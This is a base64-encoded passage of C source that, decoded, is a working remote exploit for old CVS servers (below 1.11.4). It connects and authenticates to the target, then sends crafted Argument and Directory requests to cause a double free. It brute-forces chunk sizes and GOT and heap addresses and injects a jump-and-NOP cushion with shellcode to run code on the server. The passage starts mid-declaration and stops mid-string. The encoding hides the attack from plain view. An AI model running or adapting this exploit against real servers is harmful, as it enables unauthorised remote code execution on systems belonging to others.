IGZkX291dDsNCiAgaW50IHBvcnQgPSAyNDAxOw0KICBpbnQgZGlyX2xlbiwg
YXJnbGVuOw0KICBjaGFyICp1c2VyID0gTlVMTCwgKnBhc3N3ZCA9ICIiLCAq
cmVwb3MgPSBOVUxMLCAqaG9zdCA9IE5VTEw7DQogIGNoYXIgb3V0YnVmWzQw
OTZdLCByZWFkYnVmWzQwOTZdOw0KI2RlZmluZSBNQVhfQVJHX1NJWkUgNDA4
NQ0KICBpbnQgZ290X2ksIGdvdF9sb3csIGdvdF9oaWdoLCBnb3Rfc3RlcCwg
aGVhcF9pLCBoZWFwX2xvdywgaGVhcF9oaWdoLCBoZWFwX3N0ZXA7DQogIGlu
dCBmb3VuZCA9IDA7DQogIGludCB2ZXJzaW9uWzNdOw0KICBpbnQganVtcCA9
IDc7DQogIGludCBzdGVwID0gMjQ7DQoNCiAgcHJvZ25hbWUgPSB5c3RyZHVw
KGFyZ3ZbMF0pOw0KICB3aGlsZSgoYyA9IGdldG9wdChhcmdjLCBhcmd2LCAi
YTpqOnA6cjpzOnQ6dToiKSkgIT0gLTEpDQogIHsNCiAgICBzd2l0Y2goYykN
CiAgICB7DQogICAgICBjYXNlICdhJzoNCiAgICAgICAgcG9ydCA9IGF0b2ko
b3B0YXJnKTsNCiAgICAgICAgaWYoIXBvcnQpIGRpZSgiSWxsZWdhbCBwb3J0
Iik7DQogICAgICAgIGJyZWFrOw0KICAgICAgY2FzZSAnaic6DQogICAgICAg
IGp1bXAgPSBhdG9pKG9wdGFyZyk7DQogICAgICAgIGlmKCFqdW1wKSBkaWUo
IklsbGVnYWwganVtcCIpOw0KICAgICAgICBicmVhazsNCiAgICAgIGNhc2Ug
J3AnOg0KICAgICAgICBwYXNzd2QgPSB5c3RyZHVwKG9wdGFyZyk7DQogICAg
ICAgIGJyZWFrOw0KICAgICAgY2FzZSAncic6DQogICAgICAgIHJlcG9zID0g
eXN0cmR1cChvcHRhcmcpOw0KICAgICAgICBicmVhazsNCiAgICAgIGNhc2Ug
J3MnOg0KICAgICAgICBzdGVwID0gYXRvaShvcHRhcmcpOw0KICAgICAgICBp
Zighc3RlcCkgZGllKCJJbGxlZ2FsIHN0ZXAiKTsNCiAgICAgICAgYnJlYWs7
DQogICAgICBjYXNlICd0JzoNCiAgICAgICAgdGltZW91dCA9IGF0b2kob3B0
YXJnKTsNCiAgICAgICAgaWYoIXRpbWVvdXQpIGRpZSgiSWxsZWdhbCB0aW1l
b3V0Iik7DQogICAgICAgIGJyZWFrOw0KICAgICAgY2FzZSAndSc6DQogICAg
ICAgIHVzZXIgPSB5c3RyZHVwKG9wdGFyZyk7DQogICAgICAgIGJyZWFrOw0K
ICAgICAgZGVmYXVsdDoNCiAgICAgICAgZGllKCJDb3VsZG4ndCBwYXJzZSBv
cHRpb25zIik7DQogICAgfQ0KICB9DQogIGlmKCEodXNlciAmJiByZXBvcykp
IHVzYWdlKCk7DQogIGlmKG9wdGluZCAhPSBhcmdjIC0gMSkgdXNhZ2UoKTsN
CiAgaG9zdCA9IHlzdHJkdXAoYXJndltvcHRpbmRdKTsNCg0KICBzaWduYWwo
U0lHUElQRSwgU0lHX0lHTik7DQoNCi8qIENoZWNrIHNlcnZlciB2ZXJzaW9u
ICovDQogIGlmKGNvbm5lY3RfdG9faG9zdChob3N0LCBwb3J0LCAmZmRfaW4s
ICZmZF9vdXQpKQ0KICAgIGRpZSgiQ291bGRuJ3QgY29ubmVjdCIpOw0KICBp
ZihhdXRoZW50aWNhdGUocmVwb3MsIHVzZXIsIHBhc3N3ZCwgZmRfaW4sIGZk
X291dCkpDQogICAgZGllKCJDb3VsZG4ndCBhdXRoZW50aWNhdGUiKTsNCiAg
c3RyY3B5KG91dGJ1ZiwgInZlcnNpb25cbiIpOw0KICBpZih0YWxrKG91dGJ1
ZiwgZmRfb3V0KSkNCiAgICBkaWUoIkNvdWxkbid0IHRhbGsgdG8gc2VydmVy
Iik7DQogIHJlYWRidWZbMF0gPSAwOw0KICB3aGlsZSghc3RyY2hyKHJlYWRi
dWYsICdcbicpKQ0KICB7DQogICAgaWYoZ2V0KHJlYWRidWYgKyBzdHJsZW4o
cmVhZGJ1ZiksIHNpemVvZihyZWFkYnVmKSAtIHN0cmxlbihyZWFkYnVmKSwg
ZmRfaW4pIDwgMCkNCiAgICAgIGRpZSgiQ291bGRuJ3QgZ2V0IGZyb20gc2Vy
dmVyIik7DQogIH0NCiAgICANCiAgZnByaW50ZihzdGRlcnIsICIlc1xuIiwg
cmVhZGJ1Zik7DQogIHNzY2FuZihyZWFkYnVmLCAiJSpbYS16QS1aKClcdCBd
JWQuJWQuJWQiLCAmdmVyc2lvblswXSwgJnZlcnNpb25bMV0sICZ2ZXJzaW9u
WzJdKTsNCiAgaWYodmVyc2lvblswXSAqIDEwMCArIHZlcnNpb25bMV0gKiAx
MCArIHZlcnNpb25bMl0gPiAyMTQpIC8qIHZlcnNpb24gPiAxLjExLjQgKi8N
CiAgew0KICAgIGZwcmludGYoc3RkZXJyLCAiVGhpcyB2ZXJzaW9uIG9mIGN2
cyBpcyBpbW11bmUgdG8gdGhlIGJ1ZyB3ZSdyZSB0cnlpbmcgdG8gZXhwbG9p
dFxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KDQovKiBGaW5kIHRoZSByaWdo
dCBsZW5ndGggdG8gbWFsbG9jKCkgKi8NCiAgZm9yKGRpcl9sZW4gPSA2NTsg
ZGlyX2xlbiA8PSAyNTU7IGRpcl9sZW4gKz0gOCkNCiAgew0KICAgIGludCBj
b3VudDsNCiAgICBpbnQgc3RhdHVzID0gMDsNCiAgICBmb3IoY291bnQgPSAw
OyBjb3VudCA8IDI7IGNvdW50KyspDQogICAgew0KDQogICAgICBhcmdsZW4g
PSBkaXJfbGVuICsgNTY7IC8qIHRvIG1ha2Ugc3VyZSB3ZSdyZSBhbGxvY2F0
aW5nIGNodW5rcyBvZiB0aGUgc2FtZSBzaXplICovDQogICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIC8qIDU2IGlzIGEgbWFnaWMgbnVtYmVyIGluIHRo
aXMgY29udGV4dCAqLw0KDQovKiBDb25uZWN0IGFuZCBhdXRoZW50aWNhdGUg
Ki8NCiAgICAgIGNsb3NlKGZkX291dCk7DQogICAgICBpZihmZF9pbiAhPSBm
ZF9vdXQpIGNsb3NlKGZkX2luKTsNCiAgICAgIGlmKGNvbm5lY3RfdG9faG9z
dChob3N0LCBwb3J0LCAmZmRfaW4sICZmZF9vdXQpKQ0KICAgICAgICBkaWUo
IkNvdWxkbid0IGNvbm5lY3QiKTsNCiAgICAgIGlmKGF1dGhlbnRpY2F0ZShy
ZXBvcywgdXNlciwgcGFzc3dkLCBmZF9pbiwgZmRfb3V0KSkNCiAgICAgICAg
ZGllKCJDb3VsZG4ndCBhdXRoZW50aWNhdGUiKTsNCg0KLyogUm9vdCByZXF1
ZXN0ICovDQogICAgICBzbnByaW50ZihvdXRidWYsIHNpemVvZihvdXRidWYp
LCAiUm9vdCAlc1xuIiwgcmVwb3MpOw0KICAgICAgaWYodGFsayhvdXRidWYs
IGZkX291dCkpDQogICAgICB7DQogICAgICAgIGNvdW50ID0gMjsNCiAgICAg
ICAgY29udGludWU7DQogICAgICB9DQoNCg0KLyogV2UgbmVlZCB0byBrZWVw
IG91ciBwcmVjaW91cyBjaHVuayBmcm9tIGJlaW5nIGNvYWxlc2NlZCB3aXRo
IG90aGVycyB3aGVuIGl0IG9yIGEgY2h1bmsgbmV4dCB0byBpdCBpcyBmcmVl
KCknZA0KICAgU28gd2UgYWxsb2NhdGUgY2h1bmtzIGJlZm9yZSBhbmQgYWZ0
ZXIgaXQsIHRyeWluZyB0byBtYWtlIHRoZW0gY29tZSBmcm9tIHRoZSBtYWlu
IGFyZW5hLCB0aHVzIGJlaW5nIGFkamFjZW50IHRvIG91cnMNCiovDQogICAg
ICBzdHJjcHkob3V0YnVmLCAiQXJndW1lbnQgIik7DQogICAgICBmb3IoaSA9
IDA7IGkgPCBhcmdsZW4gLSA0ODsgaSsrKQ0KICAgICAgICBvdXRidWZbOSAr
IGldID0gJzAnOw0KICAgICAgb3V0YnVmWzkgKyBpKytdID0gJ1xuJzsNCiAg
ICAgIG91dGJ1Zls5ICsgaV0gPSAnXDAnOw0KDQogICAgICBpZih0YWxrKG91
dGJ1ZiwgZmRfb3V0KSkNCiAgICAgIHsNCiAgICAgICAgY291bnQgPSAyOw0K
ICAgICAgICBjb250aW51ZTsNCiAgICAgIH0NCg0KDQovKiAxc3QgRGlyZWN0
b3J5IHJlcXVlc3QsIHZhbGlkIGRpcmVjdG9yeSBuYW1lLCBpbnRpYWxpemUg
dGhlIHN0YXRpYyBwdHIsIG1ha2UgZmlyc3QgYWxsb2NhdGlvbiBvZiBtZW1v
cnkgZm9yIHRoZSBkaXJfbmFtZSAqLw0KICAgICAgc3RyY3B5KG91dGJ1Ziwg
IkRpcmVjdG9yeSAiKTsNCiAgICAgIGZvcihpID0gMDsgaSA8IGRpcl9sZW47
IGkrKykNCiAgICAgICAgb3V0YnVmW2kgKyAxMF0gPSAnMCc7DQogICAgICBv
dXRidWZbaSArIDEwXSA9ICdcbic7DQogICAgICBvdXRidWZbaSArIDExXSA9
ICdcMCc7DQogICAgICBpZih0YWxrKG91dGJ1ZiwgZmRfb3V0KSkNCiAgICAg
IHsNCiAgICAgICAgY291bnQgPSAyOw0KICAgICAgICBjb250aW51ZTsNCiAg
ICAgIH0NCg0KICAgICAgc25wcmludGYob3V0YnVmLCBzaXplb2Yob3V0YnVm
KSwgIiVzXG4iLCByZXBvcyk7DQogICAgICBpZih0YWxrKG91dGJ1ZiwgZmRf
b3V0KSkNCiAgICAgIHsNCiAgICAgICAgY291bnQgPSAyOw0KICAgICAgICBj
b250aW51ZTsNCiAgICAgIH0NCg0KLyogZGl0dG8gKi8NCiAgICAgIHN0cmNw
eShvdXRidWYsICJBcmd1bWVudCAiKTsNCiAgICAgIGZvcihpID0gMDsgaSA8
IGFyZ2xlbiAtIDQ4OyBpKyspDQogICAgICAgIG91dGJ1Zls5ICsgaV0gPSAn
MCc7DQogICAgICBvdXRidWZbOSArIGkrK10gPSAnXG4nOw0KICAgICAgb3V0
YnVmWzkgKyBpXSA9ICdcMCc7DQoNCiAgICAgIGlmKHRhbGsob3V0YnVmLCBm
ZF9vdXQpKQ0KICAgICAgew0KICAgICAgICBjb3VudCA9IDI7DQogICAgICAg
IGNvbnRpbnVlOw0KICAgICAgfQ0KDQoNCi8qIE1ha2UgdGhlIGRpcnN3aXRj
aCBkb3VibGUtZnJlZSBkaXJfbmFtZSAqLw0KICAgICAgZm9yKGMgPSAwOyBj
IDwgMjsgYysrKQ0KICAgICAgew0KICAgICAgICBzdHJjcHkob3V0YnVmLCAi
RGlyZWN0b3J5ICIpOw0KICAgICAgICBmb3IoaSA9IDA7IGkgPCBkaXJfbGVu
IC0gMTsgaSsrKQ0KICAgICAgICAgIG91dGJ1ZltpICsgMTBdID0gJzAnOw0K
ICAgICAgICBvdXRidWZbaSArIDExXSA9ICcvJzsNCiAgICAgICAgb3V0YnVm
W2kgKyAxMl0gPSAnXG4nOw0KICAgICAgICBvdXRidWZbaSArIDEzXSA9ICdc
MCc7DQogICAgICAgIGlmKHRhbGsob3V0YnVmLCBmZF9vdXQpKQ0KICAgICAg
ICB7DQogICAgICAgICAgY291bnQgPSAyOw0KICAgICAgICAgIGJyZWFrOw0K
ICAgICAgICB9DQoNCiAgICAgICAgc25wcmludGYob3V0YnVmLCBzaXplb2Yo
b3V0YnVmKSwgIiVzXG4iLCByZXBvcyk7DQogICAgICAgIGlmKHRhbGsob3V0
YnVmLCBmZF9vdXQpKQ0KICAgICAgICB7DQogICAgICAgICAgY291bnQgPSAy
Ow0KICAgICAgICAgIGJyZWFrOw0KICAgICAgICB9DQoNCiAvKiBOZWVkIHRv
IGNsZWFyIHRoZSBwZW5kaW5nX2Vycm9yIHRoaW5neSAqLw0KICAgICAgICBz
dHJjcHkob3V0YnVmLCAibm9vcFxuIik7DQogICAgICAgIGlmKHRhbGsob3V0
YnVmLCBmZF9vdXQpKQ0KICAgICAgICB7DQogICAgICAgICAgY291bnQgPSAy
Ow0KICAgICAgICAgIGJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGlmKGdl
dChyZWFkYnVmLCBzaXplb2YgcmVhZGJ1ZiwgZmRfaW4pIDwgMCkNCiAgICAg
ICAgew0KICAgICAgICAgIGNvdW50ID0gMjsNCiAgICAgICAgICBicmVhazsN
CiAgICAgICAgfQ0KICAgICAgfQ0KDQovKiBBdCB0aGlzIHN0YWdlIGFsbCBj
YWxscyB0byBtYWxsb2Mgb2YgdGhlIHJpZ2h0IHNpemUgc2hvdWxkIGJlIHJl
dHVybmluZyBvdXIgY2h1bmssIHRoZSBoZWFwIGlzIGNvcnJ1cHRlZCwNCiAg
IHRoZSBmaXJzdCBjYWxsIHRvIG1hbGxvYygpIHdpbGwgYWxsb2NhdGUgdGhl
IGNodW5rLCBhbmQgc3RyY3B5KCkgb3VyIG1lbW9yeSBhZGRyZXNzZXMgaW50
byB0aGUgZmlyc3QgOCBieXRlcywNCiAgIHRoZSBzZWNvbmQgY2FsbCB0byBt
YWxsb2MoKSB3aWxsIGFnYWluIHJldHVybiBvdXIgY2h1bmssIHBhc3Npbmcg
aXQgdGhyb3VnaCB0aGUgdW5saW5rKCkgYW5kIG92ZXJ3cml0aW5nIG1lbW9y
eQ0KKi8NCg0KDQogICAgICBzdHJjcHkob3V0YnVmLCAiQXJndW1lbnQgIik7
DQoNCiAgICAgICooKHZvaWQgKiopIChvdXRidWYgKyA5KSkgID0gKHZvaWQg
KikgKCAwID09IGNvdW50ID8gMHhiZmZmZmZlZiA6IDB4MDEwMjAzMDQpOw0K
ICAgICAgKigodm9pZCAqKikgKG91dGJ1ZiArIDEzKSkgPSAodm9pZCAqKSAo
IDAgPT0gY291bnQgPyAweGJmZmZmZmVmIDogMHgwMTAyMDMwNCk7DQoNCiAg
ICAgIGZvcihpID0gOTsgaSA8IGFyZ2xlbjsgaSsrKQ0KICAgICAgICBvdXRi
dWZbOSArIGldID0gJzAnOw0KICAgICAgb3V0YnVmWzkgKyBpKytdID0gJ1xu
JzsNCiAgICAgIG91dGJ1Zls5ICsgaV0gPSAnXDAnOw0KDQogICAgICBmb3Io
YyA9IDA7IGMgPCAyOyBjKyspDQogICAgICAgIGlmKHRhbGsob3V0YnVmLCBm
ZF9vdXQpKQ0KICAgICAgICB7DQogICAgICAgICAgY291bnQgPSAyOw0KICAg
ICAgICAgIGJyZWFrOw0KICAgICAgICB9DQoNCi8qIEF0IHRoaXMgc3RhZ2Us
IGlmIHRoZSBkaXJfbGVuIGlzIHJpZ2h0LCBvdXIgZG91YmxlLWZyZWUoKSdk
IGNodW5rIGhhcyBiZWVuIG1hbGxvYydkIHR3aWNlLCBhbmQgb25seSB0d2lj
ZSAqLw0KICAgICAgdGFsaygibm9vcFxuIiwgZmRfb3V0KTsNCiAgICAgIGMg
PSBnZXQocmVhZGJ1Ziwgc2l6ZW9mIHJlYWRidWYsIGZkX2luKTsNCiAgICAg
IGlmKDAgPT0gY291bnQgJiYgMyA9PSBjKSAgLyogb24gdGhlIGZpcnN0IHBh
c3MgdGhlIHNlcnZlciBkb2Vzbid0IHNlZ2ZhdWx0IGFzIGl0J3MgYWJsZSB0
byB3cml0ZSBuZWFyIHRoZSBhZGRyZXNzIDB4YmZmZmZmY2YgKi8NCiAgICAg
ICAgc3RhdHVzKys7DQogICAgICBlbHNlIGlmKDEgPT0gY291bnQgJiYgKDAg
PT0gYyB8fCAtMSA9PSBjKSkgLyogb24gdGhlIDJuZCBwYXNzIHRoZSBzZXJ2
ZXIgc2VnZmF1bHRzIGFzIGl0IGNhbid0IHdyaXRlIG5lYXIgdGhlIGFkZHJl
c3MgMHgwMTAyMDMwNCAqLw0KICAgICAgICBzdGF0dXMrKzsNCiAgICAgIGZw
cmludGYoc3RkZXJyLCAiJWQ6ICVkXG4iLCBjb3VudCwgYyk7DQogICAgfQ0K
ICAgIGlmKDIgPT0gc3RhdHVzKQ0KICAgICAgYnJlYWs7DQogIH0NCiAgaWYo
ZGlyX2xlbiA+IDI1NSkgZGllKCJDb3VsZG4ndCBmaW5kIGV4cGxvaXRhYmxl
IGNodW5rIHNpemUiKTsNCiAgZnByaW50ZihzdGRlcnIsICJGb3VuZCB0aGUg
cmlnaHQgZGlyX2xlbjogJWQgYnl0ZXNcbiIsIGRpcl9sZW4pOw0KDQoNCi8q
IG9rLCBub3cgZm9yIGV4cGxvaXRhdGlvbiwNCiAgIHRoaXMgaXMgYSBjbGFz
c2ljYWwgIm92ZXJ3cml0ZSBhbnkgaW50ZWdlciIgY2FzZSwgd2UgaGF2ZSBu
byBjbHVlIHdoZXJlIGluIHRoZSBoZWFwIG91ciBzaGVsbGNvZGUgaXMsIG9y
IHdoYXQNCiAgIGV4YWN0bHkgd2UncmUgb3ZlcndyaXRpbmcuIFdlJ3JlIGFi
bGUgdG8gc211Z2dsZSA0S2Igb2YgYXNzZW1ibHkgY29kZSBpbnRvIHRoZSBw
cm9ncmFtLCB3aGljaCBzb3VuZHMgZm9ybWlkZGFibGUsIHNvLi4uDQogICBC
cnV0ZWZvcmNlICEhISBidHcsIHRoZSBuZXh0IGxpYnJhcnkgY2FsbCBhZnRl
ciB0aGUgbGFzdCBtYWxsb2MoKSBpcyBzdHJjcHkoKS4gSSB3aXNoIEkga25l
dyB3aGVyZSBpdHMgR09UIGlzLi4uDQoqLw0KDQovLyNkZWZpbmUgR09UX0xP
VyAgIDB4MDgwY2E1ZTQNCiNkZWZpbmUgR09UX0xPVyAgIDB4MDgwYzEwMTAN
Ci8vI2RlZmluZSBHT1RfSElHSCAgMHgwODBjYTVlNA0KI2RlZmluZSBHT1Rf
SElHSCAgMHgwODBlZmZmYw0KI2RlZmluZSBHT1RfU1RFUCAgMTAwMDANCiNk
ZWZpbmUgSEVBUF9MT1cgIDB4MDgwYzEwMTANCiNkZWZpbmUgSEVBUF9ISUdI
IDB4MDgwZWZmZmMNCiNkZWZpbmUgSEVBUF9TVEVQIDQwMDAwDQovLyNkZWZp
bmUgSEVBUF9TVEVQIDQwMDANCg0KZ290X2xvdyA9IEdPVF9MT1c7DQpnb3Rf
aGlnaCA9IEdPVF9ISUdIOw0KZ290X3N0ZXAgPSBHT1RfU1RFUDsNCmhlYXBf
bG93ID0gSEVBUF9MT1c7DQpoZWFwX2hpZ2ggPSBIRUFQX0hJR0g7DQpoZWFw
X3N0ZXAgPSBIRUFQX1NURVA7DQoNCkxPT1A6DQogIGZvcihnb3RfaSA9IGdv
dF9sb3c7IGdvdF9pIDw9IGdvdF9oaWdoOyBnb3RfaSArPSBnb3Rfc3RlcCkN
CiAgew0KICAgIGlmKCEoZ290X2kgJiAweGZmKSB8fCAhKGdvdF9pID4+IDgg
JiAweGZmKSkgY29udGludWU7ICAgLyogY2FuJ3QgaGF2ZSBudWwgYnl0ZXMg
Ki8NCiAgICBmcHJpbnRmKHN0ZGVyciwgIlVzaW5nIGFkZHJlc3MgJSN4XG4i
LCBnb3RfaSk7DQogICAgZm9yKGhlYXBfaSA9IGhlYXBfbG93OyBoZWFwX2kg
PD0gaGVhcF9oaWdoOyBoZWFwX2kgKz0gaGVhcF9zdGVwKQ0KICAgIHsNCiAg
ICAgIGlmKCEoaGVhcF9pICYgMHhmZikgfHwgIShoZWFwX2kgPj4gOCAmIDB4
ZmYpKSBjb250aW51ZTsNCg0KLyogQ29ubmVjdCBhbmQgYXV0aGVudGljYXRl
ICovDQogICAgICBjbG9zZShmZF9pbik7DQogICAgICBpZihmZF9vdXQgIT0g
ZmRfaW4pDQogICAgICAgIGNsb3NlKGZkX291dCk7DQogICAgICBpZihjb25u
ZWN0X3RvX2hvc3QoaG9zdCwgcG9ydCwgJmZkX2luLCAmZmRfb3V0KSkNCiAg
ICAgICAgZGllKCJDb3VsZG4ndCBjb25uZWN0Iik7DQogICAgICBpZihhdXRo
ZW50aWNhdGUocmVwb3MsIHVzZXIsIHBhc3N3ZCwgZmRfaW4sIGZkX291dCkp
DQogICAgICAgIGRpZSgiQ2FuJ3QgYXV0aGVudGljYXRlIik7DQoNCi8qIFJv
b3QgcmVxdWVzdCAqLw0KICAgICAgc25wcmludGYob3V0YnVmLCBzaXplb2Yo
b3V0YnVmKSwgIlJvb3QgJXNcbiIsIHJlcG9zKTsNCiAgICAgIGlmKHRhbGso
b3V0YnVmLCBmZF9vdXQpKQ0KICAgICAgICBjb250aW51ZTsNCg0KDQovKiBF
eHBsYWluZWQgZWFybGllciAqLw0KICAgICAgc3RyY3B5KG91dGJ1ZiwgIkFy
Z3VtZW50ICIpOw0KICAgICAgZm9yKGkgPSAwOyBpIDwgYXJnbGVuIC0gNDg7
IGkrKykNCiAgICAgICAgb3V0YnVmWzkgKyBpXSA9ICcwJzsNCiAgICAgIG91
dGJ1Zls5ICsgaSsrXSA9ICdcbic7DQogICAgICBvdXRidWZbOSArIGldID0g
J1wwJzsNCg0KICAgICAgaWYodGFsayhvdXRidWYsIGZkX291dCkpDQogICAg
ICAgIGNvbnRpbnVlOw0KDQoNCi8qIDFzdCBEaXJlY3RvcnkgcmVxdWVzdCwg
dmFsaWQgZGlyZWN0b3J5IG5hbWUsIGludGlhbGl6ZSB0aGUgc3RhdGljIHB0
ciwgbWFrZSBmaXJzdCBhbGxvY2F0aW9uIG9mIG1lbW9yeSBmb3IgdGhlIGRp
cl9uYW1lICovDQogICAgICBzdHJjcHkob3V0YnVmLCAiRGlyZWN0b3J5ICIp
Ow0KICAgICAgZm9yKGkgPSAwOyBpIDwgZGlyX2xlbjsgaSsrKQ0KICAgICAg
ICBvdXRidWZbaSArIDEwXSA9ICcwJzsNCiAgICAgIG91dGJ1ZltpICsgMTBd
ID0gJ1xuJzsNCiAgICAgIG91dGJ1ZltpICsgMTFdID0gJ1wwJzsNCiAgICAg
IGlmKHRhbGsob3V0YnVmLCBmZF9vdXQpKQ0KICAgICAgICBjb250aW51ZTsN
Cg0KICAgICAgc25wcmludGYob3V0YnVmLCBzaXplb2Yob3V0YnVmKSwgIiVz
XG4iLCByZXBvcyk7DQogICAgICBpZih0YWxrKG91dGJ1ZiwgZmRfb3V0KSkN
CiAgICAgICAgY29udGludWU7DQoNCg0KLyogZGl0dG8gKi8NCiAgICAgIHN0
cmNweShvdXRidWYsICJBcmd1bWVudCAiKTsNCiAgICAgIGZvcihpID0gMDsg
aSA8IGFyZ2xlbiAtIDQ4OyBpKyspDQogICAgICAgIG91dGJ1Zls5ICsgaV0g
PSAnMCc7DQogICAgICBvdXRidWZbOSArIGkrK10gPSAnXG4nOw0KICAgICAg
b3V0YnVmWzkgKyBpXSA9ICdcMCc7DQoNCiAgICAgICAgaWYodGFsayhvdXRi
dWYsIGZkX291dCkpDQogICAgICAgICAgY29udGludWU7DQoNCg0KLyogQWxs
b2NhdGUgYSBjaHVuaywgbWFrZSBpdCBhcyBiaWcgYXMgcG9zc2libGUsIHB1
dCBqbXAncywgbm9wcyBhbmQgc2hlbGxjb2RlIHRoZXJlICovDQovKg0KICBB
cyBpdCBoYXBwZW5zLCB1bmxpbmsoKSB3aWxsIGFsd2F5cyB3cml0ZSBhIDQt
Ynl0ZSBhZGRyZXNzIDggYnl0ZXMgZnJvbSB0aGUgcGxhY2UgaW4gdGhlIHNo
ZWxsY29kZSBpdCB3aWxsIGp1bXAgdG8sDQogIHNvIHdlIGNhbid0IGp1c3Qg
cHJvdmlkZSBhIGNsYXNzaWNhbCBjdXNoaW9uIG9mIG5vcHMsIGJ1dCB3ZSBj
YW4gcHJvdmlkZSBhIGN1c2hpb24gb2Ygam1wJ3MsIHNvIGl0IHdpbGwgbG9v
ayBsaWtlIHRoaXM6DQogfGptcCBceDdmfGptcCBceDdmfC4uLnxub3B8bm9w
fC4uLnNoZWxsY29kZQ0KKi8NCg0KICAgICAgc3RyY3B5KG91dGJ1ZiwgIkFy
Z3VtZW50ICIpOw0KICAgICAgZm9yKGkgPSAwOyBpIDwgTUFYX0FSR19TSVpF
IC0gc2l6ZW9mKHNoZWxsY29kZSkgLSAweDgwOyBpKz0yKQ0KICAgICAgew0K
ICAgICAgICBvdXRidWZbaSArIDldID0gMHhlYjsNCiAgICAgICAgb3V0YnVm
W2kgKyAxMF0gPSAweDdmOw0KICAgICAgfQ0KICAgICAgZm9yKDsgaSA8IE1B
WF9BUkdfU0laRSAtIHNpemVvZihzaGVsbGNvZGUpIC0gMTsgaSsrKQ0KICAg
ICAgICBvdXRidWZbaSArIDldID0gMHg5MDsNCiAgICAgIHN0cmNweShvdXRi
dWYgKyBpICsgOSwgc2hlbGxjb2RlKTsNCiAgICAgIG91dGJ1ZltpICsgOSAr
IHNpemVvZihzaGVsbGNvZGUpIC0gMV0gPSAnXG4nOw0KICAgICAgb3V0YnVm
W2kgKyAxMCArIHNpemVvZihzaGVsbGNvZGUpIC0gMV0gPSAnXDAnOw0KDQog
ICAgICBpZih0YWxrKG91dGJ1ZiwgZmRfb3V0KSkNCiAgICAgICAgY29udGlu
dWU7DQoNCi8qIE1ha2UgdGhlIGRpcnN3aXRjaCBkb3VibGUtZnJlZSBkaXJf
bmFtZSAqLw0KICAgICAgZm9yKGMgPSAwOyBjIDwgMjsgYysrKQ0KICAgICAg
ew0KICAgICAgICBzdHJjcHkob3V0YnVmLCAiRGlyZWN0b3J5ICIpOw0KICAg
ICAgICBmb3IoaSA9IDA7IGkgPCBkaXJfbGVuIC0gMTsgaSsrKQ0KICAgICAg
ICAgIG91dGJ1ZltpICsgMTBdID0gJzAnOw0KICAgICAgICBvdXRidWZbaSAr
IDExXSA9ICcvJzsNCiAgICAgICAgb3V0YnVmW2kgKyAxMl0gPSAnXG4nOw0K
ICAgICAgICBvdXRidWZbaSArIDEzXSA9ICdcMCc7DQogICAgICAgIGlmKHRh
bGsob3V0YnVmLCBmZF9vdXQpKQ0KICAgICAgICAgIGJyZWFrOw0KICAgICAg
ICBzbnByaW50ZihvdXRidWYsIHNpemVvZihvdXRidWYpLCAiJXNcbiIsIHJl
cG9zKTsNCiAgICAgICAgaWYodGFsayhvdXRidWYsIGZkX291dCkpDQogICAg
ICAgICAgYnJlYWs7DQoNCiAvKiBOZWVkIHRvIGNsZWFyIHRoZSBwZW5kaW5n
X2Vycm9yIHRoaW5neSAqLw0KICAgICAgICBzdHJjcHkob3V0YnVmLCAibm9v
cFxuIik7DQogICAgICAgIGlmKHRhbGsob3V0YnVmLCBmZF9vdXQpKQ0KICAg
ICAgICAgIGJyZWFrOw0KICAgICAgICBpZihnZXQocmVhZGJ1Ziwgc2l6ZW9m
IHJlYWRidWYsIGZkX2luKSA8IDApDQogICAgICAgICAgYnJlYWs7DQogICAg
ICB9DQoNCg0KICAgICAgc3RyY3B5KG91dGJ1ZiwgIkFyZ3VtZW50ICIpOw0K
ICAgICAgKigodm9pZCAqKikgKG91dGJ1ZiArIDkpKSAgPSAodm9pZCAqKSAo
Z290X2kgLSAxMik7DQogICAgICAqKCh2b2lkICoqKSAob3V0YnVmICsgMTMp
KSA9ICh2b2lkICopIGhlYXBfaTsNCg0KICAgICAgZm9yKGkgPSA5OyBpIDwg
YXJnbGVuOyBpKyspDQogICAgICAgIG91dGJ1Zls5ICsgaV0gPSAnMCc7DQog
ICAgICBvdXRidWZbOSArIGkrK10gPSAnXG4nOw0KICAgICAgb3V0YnVmWzkg
KyBpXSA9ICdcMCc7DQoNCiAgICAgIGZvcihjID0gMDsgYyA8IDI7IGMrKykN
CiAgICAgICAgaWYodGFsayhvdXRidWYsIGZkX291dCkpDQogICAgICAgICAg
YnJlYWs7DQoNCi8qIEF0IHRoaXMgc3RhZ2UsIHRoZSBzZXJ2ZXIgbWF5IGhh
dmU6IGEuIHNlZ2ZhdWx0ZWQsIGIuIGNvbnRpbnVlZCwgYy4ganVtcGVkIHRv
IHNoZWxsY29kZSAqLw0KICAgICAgdGFsaygibm9vcFxuIiwgZmRfb3V0KTsN
CiAgICAgIGMgPSBnZXQocmVhZGJ1Ziwgc2l6ZW9mIHJlYWRidWYsIGZkX2lu
KTsNCiAgICAgIGZwcmludGYoc3RkZXJyLCAiJWRcbiIsIGMpOw0KDQovKiB0
aGUgbmV4dCAnaWYnIGJsb2NrIGRldGVybWluZXMgb3VyIHBvc2l0aW9uIGlu
IHRoZSBoZWFwIGJ5IHRoZSBhbnN3ZXJzIGl0IHJlY2VpdmVzIGZyb20gdGhl
IHNlcnZlcg0KICAgV2Ugc3RhcnQgc2VhcmNoaW5nIGxvdyBpbiB0aGUgaGVh
cCwgYW5kIHNlZ2ZhdWx0IHRoZSBzZXJ2ZXIsIHNpbmNlIGl0IGNhbid0IHdy
aXRlIHRvIHRob3NlIHNlY3Rpb25zLg0KICAgVGhlIGZpcnN0IHdyaXRhYmxl
IHNlY3Rpb24gd2UgaGl0IGlzIC5kYXRhDQogICBPbiB0aGUgbW9zdC11c2Vk
IGdjYy0yLjk2ICh3aGljaCBpc24ndCBhIGdjYyB2ZXJzaW9uIGFzIHN1Y2gs
IHNvIGl0J3Mgc3RyYW5nZSBldmVyeW9uZSBpcyBzbyBmb25kIG9mIGl0KSwN
CiAgIHdlIGNhbiBzYXkgdGhhdCAuZ290IGlzIGNpcmNhIDdLIHVwIGZyb20g
dGhlIHN0YXJ0IG9mIC5kYXRhIG9uIGEgcmVjZW50IGN2cyB2ZXJzaW9uDQoq
Lw0KICAgICAgaWYoMyA9PSBjKQ0KICAgICAgew0KICAgICAgICBpZighZm91
bmQpDQogICAgICAgIHsNCiAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkhp
